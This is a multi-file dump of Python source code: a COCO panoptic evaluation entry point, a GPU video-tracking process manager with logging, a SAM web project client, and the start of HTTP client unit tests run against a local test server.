max_instances_per_category=256,
intersection_offset=None,
normalize_by_image_size=True,
num_workers=0,
print_digits=3):
"""Top-level code to compute metrics on a COCO-format result.
  Note that the default values are set for the COCO panoptic segmentation
  dataset, so users may want to change them when evaluating their own dataset.
Args:
gt_json_file: Path to a JSON file giving ground-truth annotations in COCO
format.
pred_json_file: Path to a JSON file for the predictions to evaluate.
gt_folder: Folder containing panoptic-format ID images to match ground-truth
annotations to image regions.
pred_folder: Folder containing ID images for predictions.
metric: Name of a metric to compute.
num_categories: The number of segmentation categories (or "classes") in the
dataset.
ignored_label: A category id that is ignored in evaluation, e.g. the "void"
label as defined in the COCO panoptic segmentation dataset.
max_instances_per_category: The maximum number of instances for each
category. Used in ensuring unique instance labels.
intersection_offset: The maximum number of unique labels.
normalize_by_image_size: Whether to normalize groundtruth instance region
areas by image size. If True, groundtruth instance areas and weighted IoUs
will be divided by the size of the corresponding image before accumulated
across the dataset. Only used for Parsing Covering (pc) evaluation.
num_workers: If set to a positive number, will spawn child processes to
compute parts of the metric in parallel by splitting the images between
the workers. If set to -1, will use the value of
multiprocessing.cpu_count().
print_digits: Number of significant digits to print in summary of computed
metrics.
  Returns:
    The detailed results of the computed metric, as returned by the metric
    aggregator's detailed_results() method.
"""
with open(gt_json_file, 'r') as gt_json_fo:
gt_json = json.load(gt_json_fo)
with open(pred_json_file, 'r') as pred_json_fo:
pred_json = json.load(pred_json_fo)
if gt_folder is None:
gt_folder = gt_json_file.replace('.json', '')
if pred_folder is None:
pred_folder = pred_json_file.replace('.json', '')
if intersection_offset is None:
intersection_offset = (num_categories + 1) * max_instances_per_category
metric_aggregator = _build_metric(
metric, num_categories, ignored_label, max_instances_per_category,
intersection_offset, normalize_by_image_size)
if num_workers == -1:
logging.info('Attempting to get the CPU count to set # workers.')
num_workers = multiprocessing.cpu_count()
if num_workers > 0:
logging.info('Computing metric in parallel with %d workers.', num_workers)
work_queue = multiprocessing.Queue()
result_queue = multiprocessing.Queue()
workers = []
worker_args = (metric_aggregator, gt_folder, pred_folder, work_queue,
result_queue)
for _ in six.moves.range(num_workers):
workers.append(
multiprocessing.Process(target=_run_metrics_worker, args=worker_args))
for worker in workers:
worker.start()
for ann_pair in _matched_annotations(gt_json, pred_json):
work_queue.put(ann_pair, block=True)
    # Each worker returns its result and terminates upon receiving a None task.
for _ in six.moves.range(num_workers):
work_queue.put(None, block=True)
# Retrieve results.
for _ in six.moves.range(num_workers):
metric_aggregator.merge(result_queue.get(block=True))
for worker in workers:
worker.join()
else:
logging.info('Computing metric in a single process.')
annotation_pairs = _matched_annotations(gt_json, pred_json)
_compute_metric(metric_aggregator, gt_folder, pred_folder, annotation_pairs)
is_thing = _is_thing_array(gt_json['categories'], ignored_label)
metric_aggregator.print_detailed_results(
is_thing=is_thing, print_digits=print_digits)
return metric_aggregator.detailed_results(is_thing=is_thing)
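# Illustrative usage sketch (not part of the original script): calling
# eval_coco_format directly from Python instead of through the command-line flags.
# All file and folder paths below are placeholders.
def _example_eval_usage():
  return eval_coco_format(
      gt_json_file='panoptic_val.json',      # hypothetical ground-truth JSON
      pred_json_file='panoptic_pred.json',   # hypothetical prediction JSON
      gt_folder='panoptic_val',              # folder of ground-truth ID PNGs
      pred_folder='panoptic_pred',           # folder of predicted ID PNGs
      metric='pq',                           # panoptic quality
      num_workers=0)                         # single-process evaluation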
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
eval_coco_format(FLAGS.gt_json_file, FLAGS.pred_json_file, FLAGS.gt_folder,
FLAGS.pred_folder, FLAGS.metric, FLAGS.num_categories,
FLAGS.ignored_label, FLAGS.max_instances_per_category,
FLAGS.intersection_offset, FLAGS.normalize_by_image_size,
FLAGS.num_workers, FLAGS.print_digits)
if __name__ == '__main__':
flags.mark_flags_as_required(
['gt_json_file', 'gt_folder', 'pred_json_file', 'pred_folder'])
app.run(main)
|
tracking_manager.py
|
import torch
import numpy as np
import torch.multiprocessing as mp
import os,sys
import queue
import time
import psutil
import pynvml
import numpy as np
from track_sequence import track_sequence,im_to_vid
import argparse
pynvml.nvmlInit()
sys.path.insert(0,"I24-video-ingest")
from utilities import get_recording_params, find_files
def get_recordings(ingest_session_path):
params = get_recording_params(ingest_session_path,verbose = False)
file_list = find_files(params[0],params[1],params[2],drop_last_file = True,verbose = False)
# print("INGEST SESSION PATH: {}".format(ingest_session_path))
# print(file_list)
keepers = [item[1].split(".mp4")[0] for item in file_list]
# recording_names = []
# last_recording_num = {}
# for item in os.listdir(os.path.join(ingest_session_path,"recording")):
# recording_names.append(item.split(".mp4")[0])
# # remove all recordings that are currently being written to
# keepers = []
# for item in recording_names:
# for other_item in recording_names:
# camera1 = item.split("_")[1]
# camera2 = other_item.split("_")[1]
# if camera1 == camera2:
# num1 = int(item.split("_")[2].split(".mp4")[0])
# num2 = int(other_item.split("_")[2].split(".mp4")[0])
# if num1 < num2:
# keepers.append(item) # there exists a recording with greater number than item for that camera
return keepers
def get_outputs(ingest_session_path):
recording_names = []
for item in os.listdir(os.path.join(ingest_session_path,"tracking_outputs")):
recording_names.append(item.split("_track_outputs")[0])
return recording_names
def get_in_progress(in_progress):
in_progress_names = []
for key in in_progress.keys():
in_progress_names.append(in_progress[key])
return in_progress_names
def write_to_log(log_file,message,show = False):
"""
    All messages passed to this function should be tuples of the form (timestamp, key, message)
valid Keys - START_PROC_SESSION - start of a processing session
END_PROC_SESSION - end of a processing session
INFO - general information
SYS - CPU, GPU, mem utilization info, etc.
WORKER_START - a tracker process has started (name and PID should be given)
WORKER_END - a tracker process has finished (name and PID should be given)
WORKER_TERM - a tracker process has been terminated after finishing (name and PID should be given)
WARNING - parameters outside of normal operating conditions
ERROR - an error has been caught
timestamp - time.time()
message - string
"""
# format time
milliseconds = str(np.round(message[0],4)).split(".")[1]
formatted_time = time.strftime('%Y-%m-%d %H:%M:%S.{}', time.localtime(message[0])).format(milliseconds)
line = "[{}] {}: {} \n".format(formatted_time,message[1],message[2])
if show:
if message[1] not in ["SYS"]:
print(line[:-2])
with open (log_file,"a+") as f:
f.writelines([line])
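# Illustrative call (a sketch, not used by the manager loop below): write a single
# INFO entry using the (timestamp, key, message) convention documented above.
def _example_log_entry(log_file):
    write_to_log(log_file, (time.time(), "INFO", "Example tracker heartbeat"), show=True)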
def log_system(log_file,process_pids = None):
"""
Logs system utilization metrics to log file
"""
# log cpu util
cpu_util = psutil.cpu_percent()
cpu_util_ind = psutil.cpu_percent(percpu = True)
ts = time.time()
key = "INFO"
message = "CPU util: {}% -- Individual utils 1-24: {}".format(cpu_util,cpu_util_ind[:24])
write_to_log(log_file,(ts,key,message))
message = "CPU util: {}% -- Individual utils 25-48: {}".format(cpu_util,cpu_util_ind[24:])
write_to_log(log_file,(ts,key,message))
# log GPU util and memory
try:
max_gpu_util = 0
deviceCount = pynvml.nvmlDeviceGetCount()
for idx in range(deviceCount):
handle = pynvml.nvmlDeviceGetHandleByIndex(idx)
board_num = pynvml.nvmlDeviceGetBoardId(handle)
name = "GPU {}: {} (ID {})".format(idx,pynvml.nvmlDeviceGetName(handle).decode("utf-8"),board_num)
util = pynvml.nvmlDeviceGetUtilizationRates(handle)
fan_util = pynvml.nvmlDeviceGetFanSpeed(handle)
pcie_counter = pynvml.nvmlDeviceGetPcieReplayCounter(handle)
pcie_util = pynvml.nvmlDeviceGetPcieThroughput(handle,pcie_counter)
gpu_util = util.gpu
mem_util = util.memory
message = "{}: Kernel:{}% Mem:{}% Fan:{}% PCIe: {}MB/s".format(name,gpu_util,mem_util,fan_util,round(pcie_util/1000,1))
ts = time.time()
key = "INFO"
write_to_log(log_file,(ts,key,message))
if gpu_util > max_gpu_util:
max_gpu_util = gpu_util
except pynvml.NVMLError as error:
print(error)
# log memory util
mem_util = psutil.virtual_memory()
used = round(mem_util.used / 1e+9,2)
total = round(mem_util.total / 1e+9,2)
ts = time.time()
key = "INFO"
message = "Memory util: {}% ({}/{}GB)".format(round(used/total*100,2),used,total)
write_to_log(log_file,(ts,key,message))
pid_statuses = []
warning = False
if process_pids is not None:
for key in process_pids:
pid = process_pids[key]
try:
os.kill(pid,0)
RUNNING = "running"
except OSError:
RUNNING = "stopped"
warning = True
pid_statuses.append("{} ({}): {}\n".format(key,pid,RUNNING))
ts = time.time()
key = "INFO"
if warning:
key = "WARNING"
write_to_log(log_file,(ts,key,pid_statuses))
last_log_time = time.time()
return last_log_time, max_gpu_util
if __name__ == "__main__":
#add argparse block here so we can optionally run from command line
try:
parser = argparse.ArgumentParser()
parser.add_argument("Ingest_session_directory", help= '<Required> string, Path to ingest session main directory',type = str)
parser.add_argument("Configuration_file", help= '<Required> string, Path to configuration file',type = str)
parser.add_argument("--verbose", help="bool, Show or suppress log messages in terminal", action = "store_true")
args = parser.parse_args()
ingest_session_path = args.Ingest_session_directory
config_file = args.Configuration_file
if args.verbose:
VERBOSE = True
else:
VERBOSE = False
except:
print("Using default path instead")
ingest_session_path = "/home/worklab/Data/cv/video/ingest_session_00011"
ingest_session_path = "/home/worklab/Data/cv/video/5_min_18_cam_October_2020/ingest_session_00005"
config_file = "/home/worklab/Documents/derek/I24-video-processing/config/lambda_quad.config"
VERBOSE = True
log_rate = 5
process_hang_max = 30
last_log_time = 0
# create directory for outputs if needed
if not os.path.exists(os.path.join(ingest_session_path,"tracking_outputs")):
os.mkdir(os.path.join(ingest_session_path,"tracking_outputs"))
# define unique log file for processing session
log_subidx = 0
log_idx = 0
while True:
log_file = os.path.join(ingest_session_path,"logs","cv_tracking_manager_{}_{}.log".format(str(log_idx).zfill(3),log_subidx))
if os.path.exists(log_file):
log_idx += 1
else:
break
write_to_log(log_file,(time.time(),"INFO","STARTED PROCESSING SESSION."),show = VERBOSE)
# get GPU list
g = torch.cuda.device_count()
# availability monitor
available = np.ones(g)
in_progress = {}
# create shared queue
manager = mp.Manager()
ctx = mp.get_context('spawn')
com_queue = ctx.Queue()
all_workers = {}
process_pids = {"manager":manager._process.ident}
DONE = False
time_of_last_message = {}
time_of_last_gpu_util = time.time()
while not DONE:
try:
try:
for idx in range(g):
# initially, start gpu_count processes
if available[idx] == 1:
in_prog = get_in_progress(in_progress)
recordings = get_recordings(ingest_session_path)
done = get_outputs(ingest_session_path)
if len(in_prog) == 0 and len(recordings) <= len(done):
DONE = True
avail_recording = None
for item in recordings:
if item in in_prog or item in done:
continue
else:
avail_recording = item
break
if avail_recording is not None:
# assign this recording to this worker
in_progress[idx] = avail_recording
available[idx] = 0
input_file_dir = get_recording_params(ingest_session_path)[0][0]
input_file = os.path.join(input_file_dir,avail_recording+".mp4")
# change to use Will's utilities
output_directory = os.path.join(ingest_session_path,"tracking_outputs")
camera_id = input_file.split("/")[-1].split("_")[1].upper()
args = [input_file, output_directory, config_file,log_file]
kwargs = {"worker_id":idx, "com_queue":com_queue,"com_rate": log_rate,"config":camera_id}
worker = ctx.Process(target=track_sequence,args = args, kwargs=kwargs)
all_workers[idx] = (worker)
all_workers[idx].start()
# write log message
ts = time.time()
key = "DEBUG"
text = "Manager started worker {} (PID {}) on video sequence {}".format(idx,all_workers[idx].pid,in_progress[idx])
write_to_log(log_file,(ts,key,text),show = VERBOSE)
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager had error {} starting a new process running".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
try:
# periodically, write device status to log file
if time.time() - last_log_time > log_rate:
last_log_time,max_gpu_util = log_system(log_file,process_pids)
if max_gpu_util > 10:
time_of_last_gpu_util = time.time()
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager had error {} logging system info".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
# monitor queue for messages
try:
message = com_queue.get(timeout = 0)
except queue.Empty:
continue
# strip PID from message and use to update process_pids
try:
if "Loader " in message[2]:
pid = int(message[2].split("PID ")[1].split(")")[0])
id = int(message[2].split("Loader ")[1].split(" ")[0])
process_pids["loader {}".format(id)] = pid
elif "Worker " in message[2]:
pid = int(message[2].split("PID ")[1].split(")")[0])
id = int(message[2].split("Worker ")[1].split(" ")[0])
process_pids["worker {}".format(id)] = pid
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error {} parsing PID and ID from message: {}".format(e,message[2])
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
try:
# write message to log file
worker_id = message[3]
message = message[:3]
write_to_log(log_file,message,show = VERBOSE)
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error '{}' writing message '{}' to log file.".format(e,message)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
try:
time_of_last_message[worker_id] = time.time()
# if message is a finished task, update manager
key = message[1]
if key == "WORKER_END":
worker_pid = all_workers[worker_id].pid
all_workers[worker_id].terminate()
all_workers[worker_id].join()
del all_workers[worker_id]
# write log message
ts = time.time()
key = "DEBUG"
text = "Manager terminated worker {} (PID {}) on video sequence {}".format(worker_id,worker_pid,in_progress[worker_id])
write_to_log(log_file,(ts,key,text),show = VERBOSE)
# update progress tracking
available[worker_id] = 1
del in_progress[worker_id]
del time_of_last_message[worker_id]
del process_pids["worker {}".format(worker_id)]
del process_pids["loader {}".format(worker_id)]
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error {} shutting down finished process".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
try:
                # randomly check one worker for unresponsiveness (no output messages within process_hang_max seconds) and restart it
worker_id = np.random.randint(0,g)
if worker_id in time_of_last_message.keys():
if time.time() - time_of_last_message[worker_id] > process_hang_max:
# kill process
# write log message
ts = time.time()
key = "WARNING"
text = "Manager detected unresponsive worker {}".format(worker_id)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
worker_pid = all_workers[worker_id].pid
print("Trying to terminate")
all_workers[worker_id].terminate()
print("Terminated")
all_workers[worker_id].join()
print("Joined")
# write log message
ts = time.time()
key = "WARNING"
text = "Manager terminated unresponsive worker {} (PID {}) on video sequence {}".format(worker_id,worker_pid,in_progress[worker_id])
write_to_log(log_file,(ts,key,text),show = VERBOSE)
# update progress tracking
available[worker_id] = 1
del all_workers[worker_id]
del in_progress[worker_id]
del time_of_last_message[worker_id]
del process_pids["worker {}".format(worker_id)]
del process_pids["loader {}".format(worker_id)]
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error {} terminating unresponsive process".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
#raise KeyboardInterrupt
try:
# make new log file if necessary
if os.stat(log_file).st_size > 1e+07: # slice into 10 MB log files
log_subidx += 1
log_file = os.path.join(ingest_session_path,"logs","cv_tracking_manager_{}_{}.log".format(str(log_idx).zfill(3),log_subidx))
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error {} creating new log file".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
# determine whether GPUs are still running, and restart if necessary
if time.time() - time_of_last_gpu_util > 120:
ts = time.time()
key = "WARNING"
text = "All GPUs have stopped processing. Terminating all worker processes to restart."
write_to_log(log_file,(ts,key,text),show = VERBOSE)
for worker in all_workers:
all_workers[worker].terminate()
all_workers[worker].join()
ts = time.time()
key = "DEBUG"
text = "All workers have been terminated. Sleeping for 60 seconds before restarting."
write_to_log(log_file,(ts,key,text),show = VERBOSE)
time.sleep(60)
except KeyboardInterrupt:
# interrupt log message
ts = time.time()
key = "WARNING"
message = "Keyboard Interrupt error caught. Shutting down worker processes now."
write_to_log(log_file,(ts,key,message),show = VERBOSE)
# terminate all worker processes (they will in turn terminate their daemon loaders)
for worker in all_workers:
all_workers[worker].terminate()
all_workers[worker].join()
# interrupt log message
ts = time.time()
key = "DEBUG"
message = "All worker processes have been terminated."
write_to_log(log_file,(ts,key,message),show = VERBOSE)
break # get out of processing main loop
if DONE:
print("Finished all video sequences")
for key in all_workers:
all_workers[key].terminate()
all_workers[key].join()
# end log message
ts = time.time()
key = "INFO"
message = "ENDED PROCESSING SESSION."
write_to_log(log_file,(ts,key,message),show = VERBOSE)
|
projects.py
|
import time, os, re
from samweb_client import json, convert_from_unicode
from samweb_client.client import samweb_method, get_version
from samweb_client.http_client import escape_url_path
from exceptions import *
from itertools import ifilter
@samweb_method
def listProjects(samweb, stream=False, **queryCriteria):
""" List projects matching query parameters
keyword arguments: passed as parameters to server
"""
params = dict(queryCriteria)
params['format'] = 'plain'
result = samweb.getURL('/projects', params, stream=True, compress=True)
output = ifilter( None, (l.strip() for l in result.iter_lines()) )
if stream: return output
else: return list(output)
@samweb_method
def makeProjectName(samweb, description):
""" Make a suitable project name from the provided string """
description = description.replace(' ','_')
import time
now = time.strftime("%Y%m%d%H%M%S")
name = "%s_%s" % (description, now)
# check for the username, offset by _ or -
# if it's not there prepend it
if samweb.user and not re.search(r'(\A|[_-])%s(\Z|[_-])' % samweb.user, name):
name = '%s_%s' % (samweb.user, name)
return name
@samweb_method
def startProject(samweb, project, defname=None, station=None, group=None, user=None, snapshot_id=None):
""" Start a project on a station. One of defname or snapshotid must be given
arguments:
project: project name
defname: definition name (default None)
station: station name (defaults to experiment name)
group: group name (defaults to experiment name)
user: user name (default is username from certificate)
snapshot_id: snapshot id (default None)
"""
if bool(defname) + bool(snapshot_id) != 1:
raise ArgumentError("Exactly one of definition name or snapshot id must be provided")
if not station: station = samweb.get_station()
if not group: group = samweb.group
args = {'name':project, 'station':station, "group":group}
if defname: args["defname"] = defname
elif snapshot_id: args["snapshot_id"] = snapshot_id
if user: args["username"] = user
result = samweb.postURL('/startProject', args, secure=True, compress=False)
projecturl = result.text.strip()
if projecturl.startswith('https'):
# prefer to use unencrypted project urls
projecturl = samweb.findProject(project, station)
# could look up definition name/snapshot id instead
rval = {'project':project,'projectURL':projecturl}
if defname: rval["definition_name"] = defname
elif snapshot_id: rval["snapshot_id"] = snapshot_id
return rval
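# Illustrative sketch (not part of the samweb client API): start a project from a
# definition and report where it is running. 'example_def' is a placeholder
# definition name.
def _example_start_project(samweb):
    project = samweb.startProject(samweb.makeProjectName('example_def'), defname='example_def')
    print "Started %s at %s" % (project['project'], project['projectURL'])
    return project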
@samweb_method
def findProject(samweb, project, station=None):
args = {'name':project}
if station: args['station'] = station
result = samweb.getURL('/findProject', args, compress=False)
return result.text.strip()
@samweb_method
def startProcess(samweb, projecturl, appfamily, appname, appversion, deliveryLocation=None, node=None,
user=None, maxFiles=None, description=None, schemas=None):
if not node:
# default for the node is the local hostname
import socket
node = socket.getfqdn()
# if the user isn't given and we aren't using client certs, set it to the default
if not user and not projecturl.startswith('https:'):
user = samweb.user
args = { "appname":appname, "appversion":appversion, "node" : node, }
if user:
args["username"] = user
if appfamily:
args["appfamily"] = appfamily
if maxFiles:
args["filelimit"] = maxFiles
if deliveryLocation:
args["deliverylocation"] = deliveryLocation
if description:
args["description"] = description
if schemas:
args["schemas"] = schemas
result = samweb.postURL(projecturl + '/establishProcess', args, compress=False)
return result.text.strip()
@samweb_method
def makeProcessUrl(samweb, projecturl, processid):
""" Make the process url from a project url and process id """
if not '://' in projecturl:
projecturl = samweb.findProject(projecturl)
return projecturl + '/process/' + str(processid)
@samweb_method
def getNextFile(samweb, processurl, timeout=None):
""" get the next file from the project
arguments:
processurl: the process url
timeout: timeout after not obtaining a file in this many seconds. -1 to disable; 0 to return immediately; default is None (disabled)
"""
url = processurl + '/getNextFile'
starttime = time.time()
while True:
result= samweb.postURL(url, data={}, compress=False)
code = result.status_code
data = result.text.strip()
if code == 202:
retry_interval = 10
retry_after = result.headers.get('Retry-After')
if retry_after:
try:
retry_interval = int(retry_after)
except ValueError: pass
if timeout is not None:
if timeout == 0:
return None
elif timeout > 0 and time.time() - starttime > timeout:
raise Timeout('Timed out after %d seconds' % (time.time() - starttime))
time.sleep(retry_interval)
elif code == 204:
raise NoMoreFiles()
else:
if 'application/json' in result.headers['Content-Type']:
return result.json()
lines = data.split('\n')
output = { "url" : lines[0] }
if len(lines) > 1: output["filename"] = lines[1]
else:
output["filename"] = os.path.basename(output["url"])
return output
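# Illustrative consumer loop (a sketch, not part of the client): pull files from an
# established process until the project reports NoMoreFiles, marking each one consumed.
def _example_consume_files(samweb, processurl):
    while True:
        try:
            fileinfo = samweb.getNextFile(processurl)
        except NoMoreFiles:
            break
        samweb.setProcessFileStatus(processurl, fileinfo['filename'], status='consumed')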
# old method
@samweb_method
def releaseFile(samweb, processurl, filename, status="ok"):
if status == "ok": status = "consumed"
else: status = "skipped"
return samweb.setProcessFileStatus(processurl, filename, status)
# new method
@samweb_method
def setProcessFileStatus(samweb, processurl, filename, status="consumed"):
args = { 'filename' : filename, 'status':status }
return samweb.postURL(processurl + '/updateFileStatus', args, compress=False).text.rstrip()
@samweb_method
def stopProcess(samweb, processurl):
""" End an existing process """
samweb.postURL(processurl + '/endProcess', compress=False)
@samweb_method
def stopProject(samweb, projecturl):
if not '://' in projecturl:
projecturl = samweb.findProject(projecturl)
args = { "force" : 1 }
return samweb.postURL(projecturl + "/endProject", args, compress=False).text.rstrip()
@samweb_method
def projectSummary(samweb, projecturl):
if not '://' in projecturl:
projecturl = '/projects/name/%s' % escape_url_path(projecturl)
return convert_from_unicode(samweb.getURL(projecturl + "/summary").json(), compress=True)
@samweb_method
def projectSummaryText(samweb, projecturl):
if not '://' in projecturl:
projecturl = '/projects/name/%s' % escape_url_path(projecturl)
return samweb.getURL(projecturl + "/summary", params=dict(format='plain'), compress=True).text.rstrip()
@samweb_method
def projectRecoveryDimension(samweb, projectnameorurl, useFileStatus=None, useProcessStatus=None):
"""Get the dimensions to create a recovery dataset
arguments:
projectnameorurl : name or url of the project
useFileStatus : use the status of the last file seen by a process (default unset)
useProcessStatus : use the status of the process (default unset)
"""
if not '://' in projectnameorurl:
projectnameorurl = "/projects/name/%s" % escape_url_path(projectnameorurl)
params = { "format" : "plain" }
if useFileStatus is not None: params['useFiles'] = useFileStatus
if useProcessStatus is not None: params['useProcess'] = useProcessStatus
return convert_from_unicode(samweb.getURL(projectnameorurl + "/recovery_dimensions", params=params, compress=True).text.rstrip())
@samweb_method
def setProcessStatus(samweb, status, projectnameorurl, processid=None, process_desc=None):
""" Mark the final status of a process
Either the processid or the process description must be provided. If the description is
used it must be unique within the project
arguments:
status: completed or bad
projectnameorurl: project name or url
processid: process identifier
process_desc: process description
"""
if '://' not in projectnameorurl:
url = '/projects/name/%s' % escape_url_path(projectnameorurl)
else: url = projectnameorurl
args = { "status" : status }
if processid is not None:
url += '/processes/%s' % processid
elif process_desc is not None:
url += '/process_description/%s' % escape_url_path(process_desc)
else:
# assume direct process url
pass
return samweb.putURL(url + "/status", args, secure=True, compress=False).text.rstrip()
@samweb_method
def runProject(samweb, projectname=None, defname=None, snapshot_id=None, callback=None,
deliveryLocation=None, node=None, station=None, maxFiles=0, schemas=None,
application=('runproject','runproject',get_version()), nparallel=1, quiet=False ):
""" Run a project
arguments (use keyword arguments, all default to None):
projectname: the name for the project
defname: the defname to use
snapshot_id: snapshot_id to use
callback: a single argument function invoked on each file
deliveryLocation
node
station
maxFiles
schemas
application: a three element sequence of (family, name, version)
nparallel: number of processes to run in parallel
quiet: If true, suppress normal output
"""
if callback is None:
def _print(fileurl):
print fileurl
return True
callback = _print
if not projectname:
if defname:
projectname = samweb.makeProjectName(defname)
elif snapshot_id:
projectname = samweb.makeProjectName('snapshot_id_%d' % snapshot_id)
if quiet:
def write(s): pass
else:
import sys
write=sys.stdout.write
project = samweb.startProject(projectname, defname=defname, snapshot_id=snapshot_id, station=station)
write("Started project %s\n" % projectname)
projecturl = project['projectURL']
process_description = ""
appFamily, appName, appVersion = application
if nparallel is None or nparallel < 2:
nparallel=1
if nparallel > 1:
import threading
maxFiles=(maxFiles+nparallel-1)//nparallel
def runProcess():
cpid = samweb.startProcess(projecturl, appFamily, appName, appVersion, deliveryLocation, node=node, description=process_description, maxFiles=maxFiles, schemas=schemas)
write("Started consumer processs ID %s\n" % (cpid,))
if nparallel > 1:
threading.currentThread().setName('CPID-%s' % cpid)
log_prefix = '%s: ' % threading.currentThread().getName()
else: log_prefix=''
processurl = samweb.makeProcessUrl(projecturl, cpid)
while True:
try:
newfile = samweb.getNextFile(processurl)['url']
try:
rval = callback(newfile)
except Exception, ex:
write('%s%s\n' % (log_prefix,ex))
rval = 1
except NoMoreFiles:
break
if rval: status = 'ok'
else: status = 'bad'
samweb.releaseFile(processurl, newfile, status)
samweb.setProcessStatus('completed', processurl)
if nparallel < 2:
runProcess()
else:
threads = []
for i in range(nparallel):
t = threading.Thread(target=runProcess, name='Thread-%02d' % (i+1,))
t.start()
threads.append(t)
for t in threads: t.join()
samweb.stopProject(projecturl)
write("Stopped project %s\n" % projectname)
return projectname
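# Illustrative call (a sketch): run a project over a dataset definition, counting the
# files delivered to the callback. 'example_def' is a placeholder definition name.
def _example_run_project(samweb):
    delivered = []
    def _count(fileurl):
        delivered.append(fileurl)
        return True
    samweb.runProject(defname='example_def', callback=_count, maxFiles=10, nparallel=1)
    return len(delivered)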
@samweb_method
def prestageDataset(samweb, projectname=None, defname=None, snapshot_id=None, maxFiles=0, station=None, deliveryLocation=None, node=None, nparallel=1):
""" Prestage the given dataset. This is really the same as run-project with names set appropriately """
if nparallel is None or nparallel < 2: nparallel = 1
def prestage(fileurl):
if nparallel > 1:
import threading
prefix = '%s: ' % threading.currentThread().getName()
else:
prefix = ''
print "%sFile %s is staged" % (prefix, os.path.basename(fileurl))
return True
if not projectname:
projectname = 'prestage'
if defname:
projectname = samweb.makeProjectName('%s_%s' % (defname, projectname))
elif snapshot_id:
projectname = samweb.makeProjectName('snapshot_id_%d_%s' % (snapshot_id, projectname))
samweb.runProject(projectname=projectname, defname=defname, snapshot_id=snapshot_id,
application=('prestage','prestage',get_version()), callback=prestage, maxFiles=maxFiles,
station=station, deliveryLocation=deliveryLocation, node=node, nparallel=nparallel)
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
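# Illustrative sketch of the hook pattern used below: handler bodies are plain
# functions assigned to the MyHTTPHandler class attributes before serving. The 204
# handler here is only an example, not one of the canned handlers used by the tests.
def _example_no_content(self):
    self.send_response(204)
    self.end_headers()
def _example_serve_no_content():
    MyHTTPHandler.get = _example_no_content
    return make_http_server()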
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
                self.thread = threading.Thread(target=self.run_server)
                self.thread.start()
                time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
